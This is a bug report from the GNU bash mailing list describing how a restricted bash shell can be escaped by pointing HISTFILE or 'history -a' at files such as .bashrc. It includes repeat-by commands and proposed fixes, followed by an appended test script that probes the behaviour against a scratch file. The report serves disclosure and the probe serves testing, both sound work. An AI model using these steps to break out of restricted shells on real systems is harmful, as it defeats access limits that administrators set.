| Header | Value |
|---|---|
| From | Diffie <nano@mm.st> |
| Newsgroups | gnu.bash.bug |
| Subject | Potential restricted bash escape by modifying history file |
| Date | Thu, 30 Apr 2020 14:22:31 -0400 |
| Lines | 54 |
| Approved | bug-bash@gnu.org |
| Message-ID | <mailman.1702.1588272528.3066.bug-bash@gnu.org> (permalink) |
| References | <1254402a-b6ad-4bb8-9831-7830b24c12f0@www.fastmail.com> |
| To | bug-bash@gnu.org |
| List-Id | Bug reports for the GNU Bourne Again SHell <bug-bash.gnu.org> |
| List-Archive | <https://lists.gnu.org/archive/html/bug-bash> |
| Xref | csiph.com gnu.bash.bug:16257 |
Configuration Information [Automatically generated, do not change]:
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions -fstack-protector-strong -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -Wno-parentheses -Wno-format-security
uname output: Linux host 5.5.17-200.fc31.x86_64 #1 SMP Mon Apr 13 15:29:42 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Machine Type: x86_64-redhat-linux-gnu

Bash Version: 5.0
Patch Level: 11
Release Status: release

*Description:*

It is possible to write/append arbitrary content to files from a restricted bash shell (with the privileges of the current user context) by tweaking the HISTFILE variable, or by specifying a filename to "history -[a][w]". This does not necessarily lead to a restriction bypass in all configurations, but does in a few that come to mind:

* If the user can write to their home directory, they can append arbitrary code to .bashrc/other shell files. These shell files will execute the code without restrictions on subsequent runs of rbash (assuming rbash is not being run in posix mode, and that --norc is not being passed).
* If the user is root, they can trivially get an unrestricted shell by modifying /etc/passwd, etc.
* If the cwd contains an executable script that the user can write to, they can append to the script with arbitrary code, then invoke this code from rbash: "hash -p executable_script mal_command ; mal_command" (this could be possible with an executable binary too, although it would be a little more complex).
* SSH authorized keys, various other configs.
* etc...

Again, it will depend on the configuration, but this seems exploitable in most configurations of rbash (one where it may be more difficult to exploit is when the user is placed into a non-home directory chroot where they have limited write access).

*Repeat-By:*

```
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
[__RESTRICTED] bash-5.0$ export HISTFILE=$HOME/.bashrc
[__RESTRICTED] bash-5.0$ history -c
[__RESTRICTED] bash-5.0$ /usr/bin/whoami
[__RESTRICTED] bash: /usr/bin/whoami: restricted: cannot specify `/' in command names
[__RESTRICTED] bash-5.0$ history -a
[__RESTRICTED] bash-5.0$ exit
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
diffie                      # whoami inserted into .bashrc above
[__RESTRICTED] bash-5.0$
```

OR without using HISTFILE variable

```
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
[__RESTRICTED] bash-5.0$ history -a $HOME/.bashrc '
> /usr/bin/whoami
> '
[__RESTRICTED] bash-5.0$ exit
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
diffie
[__RESTRICTED] bash-5.0$
```

*Fix:*

* Disable writing to a specific file in rbash with "history -[a][w] /tmp/bad_file bad_command" and make HISTFILE readonly. May be some other edge cases here.
* Disable history in rbash altogether.
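A regression probe for the behaviour in the Repeat-By above, added here as an example (it is not part of the report or of bash's own test suite): it runs the same `history -s` / `history -a FILE` sequence from `bash -r` against a scratch file in a private temp directory and reports whether the bash on this host is affected, with an unrestricted run as a control that must always write. It assumes `bash` is on PATH (or a path is given as the second argument); the marker string is constructed.

```shell
#!/bin/sh
# Added example, not the report's own code. Probes whether this host's bash
# lets a restricted shell append its history to an arbitrary file. Writes only
# to a scratch file under a private temp dir, never to a real dotfile.

rbash_history_write_check() {
    mode=${1:-restricted}     # "restricted" (bash -r) or "unrestricted" (control)
    bash_bin=${2:-bash}       # assumption: bash is on PATH unless a path is given
    marker='rbash-history-probe-marker'   # constructed marker text

    command -v "$bash_bin" >/dev/null 2>&1 || { echo "$mode: unknown (no bash)"; return 2; }

    tmpdir=$(mktemp -d) || return 2
    target="$tmpdir/probe.txt"
    : > "$target"

    if [ "$mode" = restricted ]; then ropt=-r; else ropt=; fi

    # Same sequence as the report, with a scratch target: turn history on
    # (non-interactive shells start with it off), put the marker into the
    # in-memory list, then ask the builtin to append that list to a file that
    # is not HISTFILE. HISTFILE points at /dev/null so nothing else is saved
    # on exit. A refused "history -a" leaves the probe file empty.
    HISTFILE=/dev/null "$bash_bin" $ropt -c \
        "set -o history; history -s '$marker'; history -a '$target'" \
        >/dev/null 2>&1 || :

    if grep -qF "$marker" "$target"; then
        echo "$mode: affected (history -a wrote $target)"
        rc=0
    else
        echo "$mode: not reproduced"
        rc=1
    fi
    rm -rf "$tmpdir"
    return "$rc"
}

# Stand-alone run: the unrestricted control reports "affected" (that is just
# normal history behaviour); the restricted run is the verdict that matters.
rbash_history_write_check unrestricted
rbash_history_write_check restricted
```

Exit status 0 means the write was reproduced, 1 means it was not, 2 means the probe could not run.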